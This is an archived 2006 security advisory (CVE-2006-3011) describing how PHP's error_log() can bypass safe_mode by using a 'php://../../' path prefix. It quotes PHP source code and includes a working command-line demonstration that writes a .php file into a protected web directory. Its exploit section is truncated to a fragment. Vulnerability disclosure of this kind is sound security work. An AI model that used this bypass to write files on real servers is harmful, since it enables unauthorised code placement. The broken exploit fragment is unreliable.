Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-3305.htm

error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2



error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2



-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
Date:=0D
- -Written: 10.6.2006=0D
- -Public: 26.06.2006=0D
from SECURITYREASON.COM=0D
CVE-2006-3011=0D
=0D
- --- 0.Description ---=0D
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.=0D
=0D
A nice introduction to PHP by Stig S=E6ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.=0D 
error_log -- Send an error message somewhere.=0D
=0D
- --- 1. error_log() Safe Mode Bypass ---=0D
error_log() function send to email, file or display your error message. You can send error messages per mail or write into files. Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename.=0D
=0D
PHP5:=0D
- -2013-2050---=0D
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)=0D
{=0D
	php_stream *stream = NULL;=0D
=0D
	switch (opt_err) {=0D
=0D
		case 1:		/*send an email */=0D
			{=0D
#if HAVE_SENDMAIL=0D
				if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {=0D
					return FAILURE;=0D
				}=0D
#else=0D
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");=0D
				return FAILURE;=0D
#endif=0D
			}=0D
			break;=0D
=0D
		case 2:		/*send to an address */=0D
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");=0D
			return FAILURE;=0D
			break;=0D
=0D
		case 3:		/*save to a file */=0D
			stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);=0D
			if (!stream)=0D
				return FAILURE;=0D
			php_stream_write(stream, message, strlen(message));=0D
			php_stream_close(stream);=0D
			break;=0D
=0D
		default:=0D
			php_log_err(message TSRMLS_CC);=0D
			break;=0D
	}=0D
	return SUCCESS;=0D
}=0D
- -2013-2050---=0D
=0D
Let's see to option 3.=0D
=0D
- -2038 line---=0D
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);=0D
- -2038 line---=0D
=0D
Option "a", writte to file error or if file dosen't exists, create new file. =0D
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".=0D
IGNORE_URL turn off safe_mode if you use "prefix://../../".=0D
=0D
- -Example---=0D
cxib# php -r 'error_log("", 3, "/www/temp/sr.php");'=0D
=0D
Warning: error_log(): SAFE MODE Restriction in effect.  The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1=0D
=0D
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1=0D
cxib# php -r 'error_log("", 3, "php://../../www/temp/sr.php");'=0D
cxib# ls -la /www/temp/sr.php=0D
- -rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php=0D
cxib# =0D
- -Example---=0D
=0D
- --- 2. Exploit ---=0D
", 3, "php://../../".$file);=0D
?>=0D
=0D
=0D
- --- 3. How to fix ---=0D
No response from PHP Team. We have reported this bug in 11.06.2006=0D
=0D
- --- 4. Greets ---=0D
=0D
For: sp3x=0D
and=0D
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3=0D
=0D
- --- 5. Contact ---=0D
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]=0D
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com=0D
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg=0D 
SecurityReason.Com=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.3 (FreeBSD)=0D
=0D
iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps=0D
qXoX8VYnwFBa2VmK3zlxpGs==0D
=VAkg=0D
-----END PGP SIGNATURE-----=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH